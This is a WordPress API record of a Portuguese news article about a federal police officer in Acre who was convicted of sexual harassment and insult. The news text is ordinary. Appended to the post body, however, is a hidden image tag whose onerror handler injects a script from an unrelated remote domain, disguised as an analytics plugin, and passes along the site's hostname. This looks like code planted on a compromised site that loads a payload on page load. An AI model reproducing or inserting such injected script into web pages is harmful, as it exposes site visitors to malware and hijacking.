{"id":50795,"date":"2020-10-23T17:56:49","date_gmt":"2020-10-23T17:56:49","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/10\/23\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/"},"modified":"2020-10-23T17:56:49","modified_gmt":"2020-10-23T17:56:49","slug":"policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/","title":{"rendered":"Policial federal \u00e9 condenado por ass\u00e9dio sexual e inj\u00faria no Acre"},"content":{"rendered":"<p><span style=\"font-size: 13.2px;\">Marcos Roberto Ugeda foi condenado a tr\u00eas anos e quatro meses<\/span><\/p>\n<p>O policial federal Marcos Roberto Ugeda foi condenado, a pedido do Minist\u00e9rio P\u00fablico Federal (MPF), pelos crimes de ass\u00e9dio sexual e inj\u00faria contra uma outra agente de pol\u00edcia federal. Os fatos que ocorreram em 2018, quando Ugeda era chefe de miss\u00e3o no Posto de Fronteira de Assis Brasil, no interior do Acre.<\/p>\n<p>Na a\u00e7\u00e3o penal apresentada pelo MPF, foi descrito que Ugeda, valendo-se da condi\u00e7\u00e3o moment\u00e2nea de chefia fez tr\u00eas investidas (inclusive chegando a tocar o corpo da v\u00edtima) com o intuito de obter vantagem sexual, al\u00e9m de ter injuriado a agente de pol\u00edcia em reuni\u00e3o profissional no Posto de Fronteira onde ambos prestavam servi\u00e7o.<\/p>\n<p>Na instru\u00e7\u00e3o do processo, a defesa do condenado tentou desqualificar a v\u00edtima imputando-lhe comportamento inst\u00e1vel e dif\u00edcil, ou at\u00e9 mesmo uma arma\u00e7\u00e3o da v\u00edtima para obter vantagem em remo\u00e7\u00e3o para outro Estado. A Justi\u00e7a entendeu que os argumentos da defesa n\u00e3o ajudavam o r\u00e9u, pois o comportamento da v\u00edtima n\u00e3o apagaria, caso fosse verdadeiro, o conjunto de provas e depoimentos apresentados pelo MPF na a\u00e7\u00e3o penal.<\/p>\n<p>Ao final da senten\u00e7a, o magistrado respons\u00e1vel pelo julgamento somou a pena do acusado em tr\u00eas anos e quatro meses de deten\u00e7\u00e3o em regime inicialmente aberto, e cumprindo o preconizado pelo C\u00f3digo Penal, substituiu a pena privativa de liberdade por duas penas restritivas de direitos: a presta\u00e7\u00e3o de servi\u00e7os \u00e0 comunidade por sete horas semanais durante os mesmos 40 meses da senten\u00e7a inicial, bem como a presta\u00e7\u00e3o pecuni\u00e1ria de R$ 200 Reais pelo mesmo per\u00edodo, para uma entidade beneficente indicada pelo Ju\u00edzo.<\/p>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div><\/div><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p><span style=\"font-size: 13.2px;\">Marcos Roberto Ugeda foi condenado a tr\u00eas anos e quatro meses<\/span><\/p>\n","protected":false},"author":4,"featured_media":50794,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-50795","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Policial federal \u00e9 condenado por ass\u00e9dio sexual e inj\u00faria no Acre - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Policial federal \u00e9 condenado por ass\u00e9dio sexual e inj\u00faria no Acre - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Marcos Roberto Ugeda foi condenado a tr\u00eas anos e quatro meses\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-23T17:56:49+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/23-10-2020_Policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-Acre.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/\",\"name\":\"Policial federal \u00e9 condenado por ass\u00e9dio sexual e inj\u00faria no Acre - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/23-10-2020_Policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-Acre.jpeg\",\"datePublished\":\"2020-10-23T17:56:49+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/23-10-2020_Policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-Acre.jpeg\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/23-10-2020_Policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-Acre.jpeg\",\"width\":458,\"height\":340,\"caption\":\"23-10-2020 Policial-federal-\u00e9-condenado-por-ass\u00e9dio-sexual-e-inj\u00faria-no-Acre\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Policial federal \u00e9 condenado por ass\u00e9dio sexual e inj\u00faria no Acre\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Policial federal \u00e9 condenado por ass\u00e9dio sexual e inj\u00faria no Acre - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/","og_locale":"pt_BR","og_type":"article","og_title":"Policial federal \u00e9 condenado por ass\u00e9dio sexual e inj\u00faria no Acre - Agazeta.net","og_description":"Marcos Roberto Ugeda foi condenado a tr\u00eas anos e quatro meses","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/","og_site_name":"Agazeta.net","article_published_time":"2020-10-23T17:56:49+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/23-10-2020_Policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-Acre.jpeg","type":"image\/jpeg"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/","name":"Policial federal \u00e9 condenado por ass\u00e9dio sexual e inj\u00faria no Acre - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/23-10-2020_Policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-Acre.jpeg","datePublished":"2020-10-23T17:56:49+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/23-10-2020_Policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-Acre.jpeg","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/23-10-2020_Policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-Acre.jpeg","width":458,"height":340,"caption":"23-10-2020 Policial-federal-\u00e9-condenado-por-ass\u00e9dio-sexual-e-inj\u00faria-no-Acre"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policial-federal-e-condenado-por-assedio-sexual-e-injuria-no-acre\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"Policial federal \u00e9 condenado por ass\u00e9dio sexual e inj\u00faria no Acre"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/50795","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=50795"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/50795\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/50794"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=50795"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=50795"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=50795"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}